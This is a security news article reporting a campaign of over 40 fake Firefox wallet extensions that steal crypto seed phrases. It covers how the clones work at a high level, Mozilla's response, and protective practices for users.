Over 40 Malicious Add-ons Discovered Stealing Digital Assets
A major cybersecurity threat has emerged for cryptocurrency users: over 40 fake Firefox browser extensions have been discovered impersonating popular crypto wallets, with the intent to steal sensitive wallet credentials and digital assets. This sophisticated campaign, active since at least April 2025, has exposed thousands of users to the risk of losing their cryptocurrencies, highlighting the evolving tactics of cybercriminals in the Web3 era.
How the Scam Works: Anatomy of a Malicious Extension
The fraudulent extensions are not simple lookalikes. They are cleverly engineered clones of legitimate, open-source wallet add-ons, such as those for Coinbase, MetaMask, Trust Wallet, Phantom, Exodus, OKX, Keplr, MyMonero, Bitget, Leap, Ethereum Wallet, and Filfox. By copying the real codebase and injecting malicious logic, attackers ensure the extensions function as expected, making detection difficult for both users and security tools.
Key features of the scam include:
- Impersonation of Trusted Brands: The fake extensions use identical names, logos, and branding as the real wallets, making them nearly indistinguishable at first glance.
- Malicious Code Injection: Attackers add event listeners to monitor input fields for data exceeding 30 characters—typical of wallet seed phrases or private keys. When such data is detected, it is silently transmitted to attacker-controlled servers.
- Obfuscation Tactics: The extensions hide error dialogs and warnings by setting their opacity to zero, ensuring users remain unaware of any suspicious activity.
- Fake Reviews and Ratings: Hundreds of five-star reviews, far exceeding the number of actual installations, are posted to create an illusion of legitimacy and popularity. This social proof lures unsuspecting users into trusting and installing the extensions.
The Scope and Impact of the Campaign
Cybersecurity researchers from Koi Security, who first uncovered the campaign, report that the operation is ongoing and evolving. New malicious extensions are uploaded to the Firefox Add-ons store regularly, with the most recent additions appearing just last week. The persistent nature of the uploads suggests a well-organized and determined threat actor.
The impact of this campaign is significant:
- Credential Theft: Once installed, the fake extensions extract wallet credentials directly from targeted websites and exfiltrate them to remote servers. This includes seed phrases, private keys, and other sensitive data.
- Financial Losses: With access to a user’s seed phrase, attackers can drain all assets from the wallet in a single, irreversible transaction.
- User Trust Erosion: The campaign undermines trust in browser extensions and the broader crypto ecosystem, making users more hesitant to adopt new tools.
Who Is Behind the Attack?
While attribution remains tentative, several indicators point to a Russian-speaking cybercriminal group. Researchers found Russian-language comments in the code and metadata in files hosted on the attackers’ servers. Although not conclusive, these artifacts suggest the campaign may originate from a Russian-speaking threat actor.
Why Firefox? The Browser’s Role in the Attack
Mozilla Firefox, known for its open-source ethos and robust add-ons ecosystem, has become an attractive target for cybercriminals. The official Firefox Add-ons store, while curated, is not immune to sophisticated scams. Attackers exploit the trust users place in the platform, leveraging the open-source nature of many wallet extensions to clone and modify them with malicious intent.
Mozilla has responded by developing early detection systems for crypto scam extensions, relying on automated risk indicators and human review. However, the sheer volume and sophistication of the fake extensions have allowed some to slip through the cracks, remaining available for download even after being reported.
Real-World Consequences: Stories from the Crypto Community
The fallout from this campaign is not just theoretical. Users have reported losing access to their wallets and funds after installing what they believed were legitimate extensions. In some cases, victims left one-star reviews warning others of the scam, but these are often drowned out by the flood of fake positive feedback.
One user recounted installing a wallet extension with hundreds of five-star reviews, only to have their entire crypto balance stolen within hours. Another described how the extension functioned perfectly, providing no indication that anything was amiss until it was too late.
How to Protect Yourself: Best Practices for Crypto Security
With the rise of sophisticated browser-based attacks, crypto users must adopt a more vigilant approach to security. Here are essential steps to safeguard your digital assets:
- Install Extensions Only from Verified Publishers: Always check the publisher’s credentials and cross-reference with official wallet websites before installing any browser add-on.
- Scrutinize Reviews and Ratings: Be wary of extensions with disproportionately high numbers of five-star reviews, especially if the number of installations is low.
- Monitor for Unexpected Behavior: If an extension requests unusual permissions or behaves differently after an update, uninstall it immediately and scan your system for malware.
- Use Allowlists: Limit browser extensions to a pre-approved list of trusted tools, especially on devices used for managing cryptocurrency.
- Regularly Update Software: Keep your browser and all extensions up to date to benefit from the latest security patches and threat intelligence.
- Backup Seed Phrases Offline: Never enter your seed phrase or private key into a browser extension unless you are certain of its authenticity. Store backups offline in secure locations.
The Broader Implications for Web3 and Crypto Adoption
This campaign underscores the growing pains of the rapidly expanding Web3 ecosystem. As more users enter the world of decentralized finance and digital assets, the attack surface for cybercriminals widens. The open-source nature of many crypto tools, while fostering innovation, also provides opportunities for malicious actors to exploit code transparency.
For the industry, this incident is a wake-up call. Wallet providers, browser developers, and security researchers must collaborate to develop more robust vetting processes, automated detection tools, and user education initiatives. The goal is to strike a balance between openness and security, ensuring that innovation does not come at the expense of user safety.
Mozilla’s Response and Ongoing Efforts
Mozilla, the organization behind Firefox, has acknowledged the threat and is actively working to remove malicious extensions from its store. The company has implemented improved tooling and processes to identify and take down scam add-ons quickly. According to Mozilla, many of the extensions identified by Koi Security had already been removed before the public disclosure, and the review team continues to monitor for new threats.
Despite these efforts, the persistence of the attackers means that some malicious extensions remain available. Mozilla urges users to report suspicious add-ons and to follow best practices for extension security.
What This Means for the Future of Crypto Security
The discovery of over 40 fake Firefox extensions targeting crypto wallets is a stark reminder that the battle between cybercriminals and security professionals is ongoing. As attackers become more sophisticated, users must remain vigilant and proactive in protecting their digital assets.
For those involved in cryptocurrency, whether as investors, developers, or enthusiasts, the message is clear: treat browser extensions with the same caution as any other software. Verify sources, question authenticity, and never let convenience override security.
The crypto community’s resilience will be tested by such threats, but with increased awareness and collective action, users can continue to benefit from the promise of decentralized finance while minimizing the risks posed by malicious actors.
